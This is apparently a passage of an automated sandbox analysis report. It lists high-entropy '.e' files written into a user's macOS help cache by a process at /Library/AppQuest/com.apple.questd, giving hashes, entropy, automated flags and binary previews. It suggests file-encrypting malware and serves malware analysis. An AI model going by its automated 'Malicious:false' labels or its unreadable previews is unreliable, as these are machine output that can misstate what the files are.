                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..J..{h....f..D.0c._j.]$...;!..5.8......f.i...(N..8.>.]...\.!........-8..*..&*G... ..>...M....E.}..b./.@)..).@d........Im..m.'..C.0........?..0.8.my......s...!&...;.0.L.0hn...>.M....a\.6......v.K..W...&.~>...7.P.....4..4pAE....EzY ....&..../..>4..Q.6...#....t...q..._.0..^....s|..B..-......F.*.@.@...G...].G.Q.gH..T.......bcy"....B...g...C...M2...+...............g....H...3..../%K...~,X.@...k...n.O. .wk....41..8......Nh_\g... =.r...).{..M.9...+.|...W..jr..4..i"R.[.`Yg./.@I|....o;OW..uE.._..zD..:3.MZ..I.......]..U..).8......6.l..ny.T.....R.L......x....8sR........x.[.....?HM..iY...Q..f..$ ...a...Y;..G)v...u.....7.X.......G....X1/.>vKz......./..-/..A....-....C.......oG.o....#>;x.g...D..>.......P...-.............s...&.. ..M.t..5Ep,. ...[5!t...7...n....c..DZ...G4......;a..E...t..t...q..).)......|.k.....g).O..fU.l..u%.!N!7xz...:U..>.....N.......{....D......x.71..F...`I..........-.Z....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.FontBook.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5378
                                                                                                    Entropy (8bit):7.89560962574236
                                                                                                    Encrypted:false
                                                                                                    MD5:4E29B9983BF656A39B1B1AD21D6298C5
                                                                                                    SHA1:CA2796530D7347A415242723B18649053F0C6246
                                                                                                    SHA-256:9C40CE74F570B803E51A89F5F512F9748E432013934025B057A198E352B39E59
                                                                                                    SHA-512:69BE9202938068B442CC26957105C759B971B2144115F1C67736060DA6AC8D4355D4CAF184C61B5C305F92CB5E191ADF986D3C3B7088ABD5E0CB2D2E4468DC6D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..v...\.(s.u.CC..c._j.]$...;!..5.|...7.p.wUc..;H....N(Q...5..;c#(.....\.mNN_!...........Di..&........... ....]..s3I.K..@7.x{.Y..>u..-..z0.._x.1....K.H.9. ....]...L.'.?.z..J MH+..H..:#j.....\.){.B.....i6q..y5<4*.0. ...4f......D.....(...U..lEg.....?/....]...}......bu.B.N....._...<...aE...C.l.e:vo.+.x8X3.c.I.q.5.....j.x..F...y. K...h~.....:...N.c...+.0....uoO..W..KswE.3.."....N.H.$..j6..g.X'....O7.{..KO.B..r+..v..c...%.EA....({...;h...".......5.4....;.^.y.UxgG2.j..oYiH.aW.Q.....6....R.......$}.....o.._~..k....$...b.....w.B.`..[W.....o:{......R&_.......I....-.m.1..(.,.v...7z..G....`&2..."&Smi....+......1+Z..#.F...|.]..S#.;.....2q+......q...b....7..,.[s......3P...WMetf.L;G.....]d...._|.I.=W..E.9.Q.,.(e#.p..\.fh}..e.....~...#...C...#.:.......g.......te..X0%`e..<<....T.............'.TF.]..4W@....F..~.......<`.>..._C.j....t%vK..i.;.i/j.H...;%..."....W...7.p!........=._...x1EC?/(6...:.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Grapher.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5922
                                                                                                    Entropy (8bit):7.919061627654921
                                                                                                    Encrypted:false
                                                                                                    MD5:21E545518317CB42E725A88D7F7487C0
                                                                                                    SHA1:4FBB4B5D9DC210C666E7316E1B73A43BF4061AB1
                                                                                                    SHA-256:0DEB856BEB3373682C985D7E2EE96CDBE894EFD38321608096BBB37F6799A29C
                                                                                                    SHA-512:D0B17B80A9C20B2FE7B63A9C78E9629EE3F243C0A93AF79A77E0B48F9B9A1F71DE5C51A1FB84A394F81971A7AD8554A28C4846EC2803D951F5B367765EA7657F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.0...aE..1..H.@..c._j.]$...;!..5.....vDj...ZN~.9.#....;.....C..{d="dj.}/..Rv9..4.?..)w7?...8\.f...I<.T..|.}...B}3.....B..b%...H.`#..eZN....@c]...{....7,~4...I.E.e.5R>..x...s#T?.R..S..;a.Gg..'k.k....K......q...C.0.....{MJu...>...%.I[..y9-.:.8hc.................&.$ee.....{yS.....j~....M.....d.... e;.<.k.U..d.:0.z..Asf.+sl.{.e...3......t,-..)T.N...0h[.)..WsC....hGU.R...u..y.Q....Q.U.>n'...7WL8.y....-o^...f..Rh~fa....U..q.T@<.....n.......c.FE.F..W..-.9Rb..37.H>..O+].l..?....D-.,/b.....d..x.Y.D.....m..4U..\..D..q`p.U.,..._..E......h..HC.......>......!`W?9.m.?zi...8x5...X..F7M.m.W.8.%..Th.. (_8..+........A.r.Kv......~3.B.~......x..|}..et...._.:.......^...........o%.F.(...........@...t..w..Q7[..mZ .....8..!=].....|m.....nd7w.GN..!1......vp....;.o.:..[..u&.A.w.p?..t9..k.....D..(..Xu...'....Y.3@../.>.....~tiS.(y{a....g!q....#....S....../<.m..Bj..z..>.....z.Z..B#LVo~Nh1...v..;J.......@
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ImageCapture.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4218
                                                                                                    Entropy (8bit):7.868516666015542
                                                                                                    Encrypted:false
                                                                                                    MD5:78EE757CB51F97055B991CAA6D5923AB
                                                                                                    SHA1:55D313137A3F3F4651C7AFFE2F9808466EE49512
                                                                                                    SHA-256:6A9D01B48E3CC4E4FDC46113C14828B6CB41FD2BB53A112714BE725D5A259E62
                                                                                                    SHA-512:3F7B74C7C3B82A7AC91D4C2E38541DC0F1C587A06AFEE480D485CA44DD3C1B5C22EF1BCE07CEC811A07433B87B36D41555C3F4C64CCD2F6DC61E17216A625246
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.Z?..M*q...h..4..c._j.]$...;!..5...J"..#...[.....Y.......f.gA9.a ./.......Z.7.|.O...3F....^A.L.B./B.@.....Z?H."{..o.......E.Z......N..c...."o..../.y'....c...s..........K}.k...J..#[8O......._..y...&x./H&..U.....\a^..*.?....^.z...N..]...O~u...XF.........c.?....7....S|.-.elp......7..b..{..12.'_....8..=&...7;...*t.dK.;......QP..O<.....(.l}e...+y.t.!........./..:A..u.u..+....WV..aH...;...aC.......A...H......1.5......dQ%@kz...4< ..CL........5....i......U.w.0..O\0.a.....m.q..e......D.(V..........X.......c.....n.......Bdm...7S.A.4....lS...I...J..N..dB.$..P.\.JG....r...r~0L..........mkg..R.)...<..P..T...2y.q......X..{Q.S.5#......U........U..J8...!L.d.4J.`,.}+^.1.w.7..KL.?5...C....5......T.Zh..\.~=...A...%.P=M?[C...G......Rd^.@..Y..]g......Z..Ce.."X..!5....C.Vrl..;M.d....\.XV#..!~.........oCL....;...l\\.@.3..V..-.;...-<..=..".5..Q......i....p..E%:..!.D.#..MOI....^..x..e.Zx..........T..N
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Mail.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):42220
                                                                                                    Entropy (8bit):7.993327593101016
                                                                                                    Encrypted:true
                                                                                                    MD5:CB2972B3D45676E895C871896E7AF23E
                                                                                                    SHA1:27881528D0A1A9C1F8E3978B20D2635ED1FAA771
                                                                                                    SHA-256:4A1F1095CC85D2AA008787D1169E0C8F1582C3C9EBD1457F9F669050036358DC
                                                                                                    SHA-512:1D914187A1F669067E2B669C2CCC4D7B9D2E14A294C9F23D6F176BD65724E804DBA8B09E108406FAF9746AB16B8D2950D1EE50F1BAA2C73AB2E952BA2CB4DBA7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w....d..g...Ayg.c.:.+y.....L.....{+..1...+O$P.'FI..9.o..h$5.....=...n2.WO...(1.....o..$........?.I..!!....2..e...........,....@].{NR.k.<..M......h.i..........s."...MG.....i....-%...g.....u.D..pX..@.-....9....*.s..*'...9}r0W..........S..]....E....R5.I.T...lj...B........93.......B.y...w.m..D.@...9wS....=...\$.k....z7..!D(hN!.<......b.R..5..w[..^........V..=lI.........{+......G(..Y........>.z?......F.....w.o...8>..q..]..l>.)J%....oHT...4.e+....\..|o.........Z4.'.N....1.\...&.^..."......W.../...<.P.U.xT...."'>5H.P./.nB.u.........~.x...2.9P*o..7s..D..6..V...|....%....{>..s.FL.....v..$E...x.5...o.g..#xN........q.b..."....'mL..B........ch"...Bh=.ws....5.......&..T...~R.\...5..3.%;>.N.......2Q+sj#. ..-..nUK..... .-..{....k...V.+.........w.2Bh...R....E.+.....=.E...Y%.B.Y_.6.k.F......3.....c.....Z..<..!...c....AS....}|.L.d.P.}..0...........]..z......*.. oZ..rE..j.....B..8....g......|....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Maps.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6730
                                                                                                    Entropy (8bit):7.9347521846964195
                                                                                                    Encrypted:false
                                                                                                    MD5:7D617A9AB089C95983C1502B7C3AC0B9
                                                                                                    SHA1:E51BFD7EB9D4D089A0A6F2210D0315A5BE3AEBD0
                                                                                                    SHA-256:344BA7A683477F53A4F9CF271D63758F840F72863DB198CAE2C527FFFB1B5E00
                                                                                                    SHA-512:3600F3916BCC8FC6C0F72DD0E3D0E7A05120CF456E66EA5C73A713D909BCBF0E9CFC42E4598640E749CD053343E087A51015B5DFCE49AD49DEA2ED1DB1DB8962
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..Z'.v.k3Aj.p.$..c._j.]$...;!..5.)N..[....~3.oS..........M.Ce.x..i.;1q.....1.I.C..k.H...gN..........P.....46.....;..x.@y.Z.....\...#.7.....W..I.....}}....}.B.XZ4j}.....E..N.....P...6.h.k!.......gB.)_2...75n.)M..........X.a..U`...../..._.m#Q%...GJ.~..I(s_I..8.~...!.......Y..@}.!E...jj{.s..........|q...RD...L......O...G.g>.Wnq,.Z....O...~.......[....Y.v...F.q..=q[1Y..AP.FJ(&.u.K.Hl....e.~..`.aAt.....8.~R.wH..{g.u..$X.}.q..u>.&..<=jl....h.~..>...?;ec/....I.u...@........<.z..s......+...G...L. u.ni../..V...j...4z'.7.q4*.....g<.|..]..3...jN#..-O...~.!...v...M........<cB.T.g.pR."U[...ki*...-/....jM..2..X..c..=D.#x.!..#.....[]..m...e./.6..rb...O$sG..f....Jv)..x..'......2....1......FBc.W1..;.F.n{..2.+..r.A.....5$...T..>...y../.p..a.}....}G.....A3b .9.V.{. ..If..............).`L...5...%.......O._a..=......f.[..U..[.:........R...E....3....=...I.......l^O[t._..n.{`.A......&t:.!L..o.J.v...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Notes.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7258
                                                                                                    Entropy (8bit):7.940696842347732
                                                                                                    Encrypted:false
                                                                                                    MD5:F26C3148CAFE3952F25C28B7C0B818D7
                                                                                                    SHA1:E133A81812C5C5C246762D741BBF29EFA9F8FFF4
                                                                                                    SHA-256:8B80D28411A0B8DF5BA637B05B2C743976D2FD8647D9161C5D932D21F2627BF5
                                                                                                    SHA-512:9AE091609589BCBDFDC0BB020323DF9BE314579B3E5B8F75D94FDAAE65182D2397A9736AFB7E670BFA5BAD265ED43CD46ECFB57F80278E9777AF858DA715ABC7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.. 4}.%E.cL....j.c._j.]$...;!..5..W^q.GGqE.K....0....'J...G..ERh..a......V..f..Gz..O.d.N..>H... t?k.B<B.....}UV..n..z...'P.....UkT.>....d....*1.>ef.{...0..>...u..}.|q.3...y..\..'.....L....2....."W.......jK.......C...>.......+...UP.............lH...........#A......j..Q..O..#6..F..7...L7..x,543..O......9.R...9ax...........:.Y/....f.6.........HB{........8..|.O_.......1..;....3B..~.K..3.w...q..ft..a...[f.O ..VU7U.......s~yL..g....k.+..Hz..W>+#s.$...I=...c,q...JA.d`.J;'s...EJ?...P....&~..r.`.p......c..-@.9...n@..0....g5..~9....r^.o....*6..J|.s...m.<....s..o.!Vup.7...`x`....M...?.9..o.:\.u...o.Ou.B..*.^....."P....F......a=...j......K....pF,.....M.7.].)Y..Ca...?..g8.7.P..+./M......n...s.._..h..^..y./....Lc...1.,.|.).....a..w*..v_.......n.x...a...2.+.Q...J.E2....EDQ..~.[..b\..6...9.[......]N...........D..Z....=...R..ZO...y...j.n9G..e.R..'....l..86..=JD}.x......E.'...............o....G
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.PhotoBooth.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4626
                                                                                                    Entropy (8bit):7.8813327879988115
                                                                                                    Encrypted:false
                                                                                                    MD5:DB034841984FDB40ADA51409AF68B1E7
                                                                                                    SHA1:726532337958F3B926E0258A4D44BEA480910881
                                                                                                    SHA-256:7451ECA8EAA01E7B40C59F59D73AB363133FDC9F51DDD08A6E1A349A7F74186D
                                                                                                    SHA-512:D94A817219531C193128DB9E52564854E6A28C916BB007171126FCEB594D379B9E94ABD60AD89BC41540610F5FEA2F375BA2C7156FAD650E421852A59ED6085F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w....t3..#4.M:....c._j.]$...;!..5.w..G$..X.z...{...k..2.d,]!..a.>d...Wr.........&.B.?..J..f...V.5..R@&:....U].K.#..K..%u.y5$.B...#.p.f../O*...X...`...q...(..i...w...F.M4.$r.....J0.[.).E.<.E..>.o.N.\..V@..o..{.y.... .w.o....}' ........R6...5O.Z.X...$....2.!M.,.2A(wh)..d..u.-$\..C.#&.5.0W.G.U.4....\:.\`.....66.,.j...\p.%.J.........5..{.h.NgF....q.Ri.&................lLf.o.@..j..@`Um..n.'L..%..Zz..U!v...u..J.N..=....>..........f...h....6..|..t..........+......aO..>..-...E../...oe.i..t.H.n....M..(..V.9.5.v6..N......^.<D.....0%....si1Z4.w.0\.7......dA.....Je..-.Z.. .."......h.....s..e..V@..{k<...,.x...s...g@KO..C...<...&..%M.n.!.2O.l.#*x.8..&.o..[...J..D.n....>Bo...C`..l....=#..y....G.....AR....F.... ...$..b.A-T................g.K.....7@aZ.O.}b................1....`..N.....-s.+....]..m..1...R.....R...=.......(.%..p..F.:Ap...io....=..y...B.<q.v.cz..../..U..;.I!u#....|D.......&.~.Rk..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Preview.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):15938
                                                                                                    Entropy (8bit):7.977889899851208
                                                                                                    Encrypted:false
                                                                                                    MD5:41450F57D4014D34676691E31E09CE18
                                                                                                    SHA1:9012AB04D53832A6A90599E4BFFF1323FF95DAC3
                                                                                                    SHA-256:830906531336C51ACEDAAC145FC0FEAEC574EDD0AA603F568EBC3E8C04C2A63D
                                                                                                    SHA-512:4E6B03B948A128AB9E4F5E6D3AF92A63A3C9702D0C7527D11B246C46E95C8A11B5278D3B645E02D2C05C764C74074746141455BBBD646F90841556C35352272C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..!..u7.G....e....{.r..v.........^.t........n...}.:.,./.}..yu.F.V....h...X..../.Y.y!J..V9..3R...#...W.4*.u..............0...p6.>q.4..i....v..2.E........Z..t.>.E<.[B.:.+.*...Y.T....X.#.....Jp..4... 8 .'.C..{.h..i..n[2?./..^..k.....:....6_#..Y.W..7\......BU`K....U4q..!.3._.......R7.^t.G.j.i.....&,t..5.U..u......X..E.kY..j.n)..XS....!vh\W.5..y.....`y?._...Z....w.&...}Bdd..RO.8..<....w..m...O..EZ..r.d...~x..2.(....f>.K...{...z...Xr6y........}.S......Q}...F.u.Z....Z5...!.7N....S.S..r{.......l..C.Y3.<5_F..:.*.5.{|f....,.....;.*/Z..T5.*.r..>...9#...r.YR..)...A..f....b..O.......^?j..%.Q....!.5Wp.....o.AVB..3X.T.....-..0..u.c...^o..R&...HL.....5.k....fh...8....f.G.u.....,..f.)..Q..p.}.._O....+.8.....,'>.ksRnT.....e..T.........t..L....3.;&]..Z.......~~.5.`...:1..z....6.......A....R\n...+2......D..G...?Q..{i....M.....i.....u...nLPT4.Y"..VV.....4.%r.bOu..E=nr~.209.........RP.....;u...W...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.QuickTimePlayerX.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9402
                                                                                                    Entropy (8bit):7.95524728499868
                                                                                                    Encrypted:false
                                                                                                    MD5:14406DC4956F70C244E274AE0EC465FE
                                                                                                    SHA1:138318545730C5AD905074C1A3E73B186B928BA2
                                                                                                    SHA-256:B3706745B09674E8789E62AE296BC7004DF11BB06BCD1C38336F257DCBE8DDEC
                                                                                                    SHA-512:24B89EBEAE1D8E180F6C5FD3ED4E7194E51B8545C7AD79B265071A1ED83F547D72B6E3E9DB273F65BF9A518AC8A5A18E801D0C01C9D0B4350BDE15840424D715
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.#0....e._W....('c._j.]$...;!..5.q\s?....".Q-.i...`..S.I.UC.......h...........L$.....C%.CT.0.~+........2.h;do...p1})..)........#.P...g..mK..5.5..f#.T...-.U3.u.S.....h....|ZeF...i.t..b!......;B..b.....+.X...u...G..>.1....D..6g'.L....<"..{n...........zZ.e>5..~.........m.6..C././..S.............n..h...YF ................<....U.y.n.........h$\...z.G..\u...H.p. <..Y..a>.]........v...MT...@$.,6.....k...aI..z.....@..A..3..>..o.H.....=U.6......(....F?T.I....C6b.[.Qz.>W..........p....>.x.z:c.y...O..B._..r.x....:Y.U..2......S..0A..`.U..0.\...'.blN"..M.;...;.D....!5.gxM...5_......J.....(..... L.T.E~o`.....x...\...5...mT......)<..6..aR>......@,.....l...uY....R..:{.M|.H2.Ti....}...}B...bD...-n<.wD.._.wv.>.0eQ`.........H...F.(........d.z.l.0...e..,.........wf.9# ..wz..e..1..5B...../A..Z...z^_.....Ze.*..t.......A7..........Cqp8...{.'..k..R...6h...s.........[.g.A.hA.l.^i%.9.r.+.........n.d...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Safari.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):36316
                                                                                                    Entropy (8bit):7.992916837040278
                                                                                                    Encrypted:true
                                                                                                    MD5:DB1D70FB33AD7C170D0F0A3B912DD3F8
                                                                                                    SHA1:924E810143B851D378B22F24314671A1D93AC853
                                                                                                    SHA-256:826CE1ADE47D802A4B7E271806428D64657740B15FB93EAFD23598787C3469CF
                                                                                                    SHA-512:80C5DB98B7CE8CBED34444A8FB9A717A7330AACC840C2C072BF2D38B0D4B1A8D2C06F5180D435B8C11EE25AF771B04A0BD48C0A0464D64E2566F449CA14715C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.w.....=tj........{....o..L.....{|)...1i..d.......9.o..h$:@.B...p....;.'*...~.....3).U.A0.P...3(W......cz.\.r....J..S.DB.b..6...&.............. .(....!q.....%.8g*1.qZ9.l..~...,./.'h...s.!.2..L..ff....y/R.. ...[.5.dk.p...j.YgSe...h.c;...a.4...S.3RR......$....'..x~f./...rL...g!S%z/uyU...h.>R.M!..T;x....XD^eG...\.9..R..(....C.{.=l.........;.......@.>...782....P..,kf......1e..9.0...t..E...7Sh.....w<N..44.7...X........O..V.S.......C..c...t.I,}.D.#.......<........Dh...Sf....c....K.3p..O..4..3V0.%.HY..a.DH..N..6..'U.X.7D....U..I.n?HO.............Rj.......O...e+.A.1...`h......'....`J@R.v_Z.'-..]..(........W..`. .Ju..w..........lJ6...g.D...]h.D=:...hBx`.`...O.!w-..#@.U.(..McPC.]..s...J...\.H.aX...^0.+.P..+....u..g..._b^...."..j...l..+E.U!..)6.{.Jb...D.@j,#^...D..uB....[....%.......N....r.Z_...IZ.~6&....".g........x.BbgR.A.2..d,....@tqG).>i...jI..g....C.Om.P[..^qw 08t)."..k.g8..`TJ.. .X
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ScriptEditor.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9290
                                                                                                    Entropy (8bit):7.953139324057074
                                                                                                    Encrypted:false
                                                                                                    MD5:12BC2EF3F0BA042C8DA3E8A381014BBE
                                                                                                    SHA1:0975C5FC4B86A2F88C6C8609ED46B1F6C0F1DAC7
                                                                                                    SHA-256:619B43A5AA5AEB3ACA5D658126CE4EAB10FA2CB229EE9348F64D001F8B1F997B
                                                                                                    SHA-512:AE61D60468693DE50D51560D68166A8926469E5C543A9E2461BAD05804864F3FDD8CF72AB28171149D75CBCECDFB2DD412A73C5B46C829E73FE66C18BAFC83A1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w.f..D.ky]p...^14.c._j.]$...;!..5..e...).l.....FY..%...1..Wi2Dr..v.....XP...X.......4._.,*..i..gA...hw...t...R..'.....&D.<.Z%y...y1I.w...i)..:.; X7...~..8. ..`5....m....]...AAYEg\.Y....8K.."9.`r...}..J5.....@..9:.*#.+$.E...MoK<..?.nL...1.y.*=rkJ.L1...Pby.i.......x..d...eq.;.lQX...>a$_.=.....q...J:....uoGz....(..#..6Dg....]....J.....Q.TnIGo...(....J_=s....&..o..7.....y.WTCG.R$%.%l.e+,.N.5..|...^q.....@..=...E..S..}.z.....]..X.3..n......i..ZWwG.Z.K......C.v>..K$J05..N7.....J.../8,0..b.Ma...Nzb.{.Z..X..u..`K......X....J1+.J\f?.....m.v:s.t.3..Z...}{...=...$...eG.q...UA..8...#G6...CQ.[].pT........J...>dSF&0....C....W.....;W...Bz......y....c..9U....'.S14.d.....2..a...8J..Z.......??.g......9.*r.#.......xq.....%..[......4a.|........Dn..f..3>.5bt...^.6....-m./.IV.?........4.4.......[...I.......&.!.....}26.`.#....(-.6=...0..s..^c.a....(._........1.....R.:.).j....o.W..u@..7..K...0...V.8.D
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Terminal.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):22483
                                                                                                    Entropy (8bit):7.985884801073862
                                                                                                    Encrypted:false
                                                                                                    MD5:DA6446B1704835DC72A5312EE727C49A
                                                                                                    SHA1:253D516E7381CAF51933C2512525D3D97D63A09C
                                                                                                    SHA-256:E6AC2A3C7BED420E21D52BBE5247F99A3F7A46487C459C38167F043D2539CDCE
                                                                                                    SHA-512:B503D9493E1876868932C7CDFF08E755E75E206C53AFC19492145216D7689D3653F813FD698CFA20A13ED60A915206D5F86AFCAD0E7C6B0076949E461ECE8288
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w....q..Z...B...S..{.r..v.........p......cs..^y9...9.o..h$?. ...W.<.h..:L.w....F.F.k....4XK1..Y&X.T...1..Ej...$..#>./(h..Zx%I....+l...y..E....(.pW........h.v.2.0....mQ.8.p4..;.....A.k.N.wR.Z..g...L.v...........!.Q.}.\..&;.J!...._......jM..........g....q7....s.....S...v.-,h.7,...g!Yu[.b.v..*..B.LV2.~c.z...R_.r2.DF.......!..~<.6P.DH.m8U.>l4H...rC.4......^.......J...p.3}....BI\.=..Pg.Pr,.....,..'u.?....0.....R...W.B.A..=..+...s0..d.........w."+M.U..\..%KCX.C.J.b.+.bb..y.,.....P....4"..c_g.5.<".G.M.).I.F..^K...+.u[.y"..jL6.c!h.......R.........4...#.M$....kjA.......ZVZH.u._6.uJ.8JH/.............x..b.0V....P-./G..".....]R.j..o!6....S...QrQc........tJ...&gR|.<^...N.!.Jr.1.`B.@p_..cyb.E-...s..6{Q.`Q@|..h.V. -.........t..nK.#.....s*....gtEk._h.C3....G....?.bT...[.....0;..(.9.......!..lK...?........`.1...-....1L.J..AAp.............x.~.D]R...l1...........W..*Ej.J..<#[`(.z..3...........;6.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.TextEdit.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11314
                                                                                                    Entropy (8bit):7.965170147049787
                                                                                                    Encrypted:false
                                                                                                    MD5:22306AECE611BEF635662B4214CC0CDA
                                                                                                    SHA1:20D7928EB9DCFC6AC4BFF85C94C643D3CD92B164
                                                                                                    SHA-256:C04E1133A2EEA3BB24E311EFE48A039EC8BFF734636187853B3562A5B9A2C0BD
                                                                                                    SHA-512:4A8BA40A860F8FB15CCC467E0E5F8F25F21FB1FBAE526029020556A03FACC2DB03CC37FB37F15785A7E4B4D5B1C5767A7703545E2C3B5FE955063E80AA289E69
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /.`...+.^...J...s|JC9q..$-.h..g.(.(}?U.q`..'t ..!Q..U....E......-......\....J....k.Q.u..Bn.~........&...6..`..w..CG.D.....^0..Nd.{.r..v.............q;..,...{.....$...U.....8....6.....X|...........3M.p..6GP..... .h......L."...:T..SNkFH[....7..5...~.:.....=..4...Y........5..........4&...h7[..7...CP.~..Xm!....No.K..sX.YZ_.,.+.".>.g.WjQ.......j.H.........c.......x...x...\<.7...e. .~.3.....!x1..........g...u...2../%.......1.>....T..?....%.e/....+&..@..,..U.k........~rx _...M.K..J...]...'U~YM..F...T.ph.!..Z....1.+.....6L)\9..-2_.:%t....*/D[...E'..p...!.X....[?."..6..c..0....*.:.`...d.".)..f!/..i}l~.\.t.....7.sR.......(.s3._....RZ...tf...LB..%C(..Y..z..1;d........8f@.M.$.e.G.s.G....Y.-......AR.......<..f.,.......E.*..~.5-,s....2..q..........Y......S..=...4X..W.R.`)P.{..._.M%|..b.&8..-.Js..|../.._?G.y...v..C.....g..P....1...-P7..g.J....s...m....P..8.O.Q...e..l.....j.....L.@4k1+....\..1"...l..C.*SG{}sG2..p...9.......k~<...... _,.......C..../.G...sOG...J...t.*B...cAi*Y......tN..\...........v....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.airport.airportutility.help.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):17331
                                                                                                    Entropy (8bit):7.9770891656774765
                                                                                                    Encrypted:false
                                                                                                    MD5:242A17FD3A17693DDF09D35E682DA37A
                                                                                                    SHA1:24E5ECB58072E55CCE6BF682DBF49ECBA5DDBAC8
                                                                                                    SHA-256:23DC02AD0AF61C256D76E74A0683CC50A8C5671670EE6EE62886CB7B13F4C56B
                                                                                                    SHA-512:FEC04D77D79761B353843F3C31E6E5BB68B67E4313230A47A7E84BB977A83C2F314C104DA46294469B95DE67BDB210C108FF3C9F133787207F9F50DDF6FBEF05
